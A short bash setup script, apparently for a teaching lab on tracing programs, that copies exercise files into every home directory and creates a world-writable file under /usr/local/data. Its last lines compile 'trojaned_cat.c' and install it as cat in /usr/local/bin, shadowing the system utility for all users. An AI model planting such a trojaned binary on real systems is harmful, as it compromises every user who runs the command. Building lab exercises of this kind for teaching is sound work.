#!/bin/bash
gcc -o mystery mystery.c
for f in `find /home -maxdepth 1 -type d`; do 
  if [ $f != "/home" ] ; then
    cp copy.c empty.c script.sh strace-identify tiger.txt mystery $f
    user=${f:6}
    chown $user:$user $f/copy.c $f/empty.c $f/script.sh $f/strace-identify $f/tiger.txt $f/mystery
    chmod 644 $f/copy.c $f/empty.c $f/strace-identify $f/tiger.txt 
    chmod 755 $f/mystery $f/script.sh
  fi
done
if [ ! -d "/usr/local/data" ]; then
  mkdir /usr/local/data
  touch /usr/local/data/carnivore
  chmod 666 /usr/local/data/carnivore
fi
gcc -o cat trojaned_cat.c
cp cat /usr/local/bin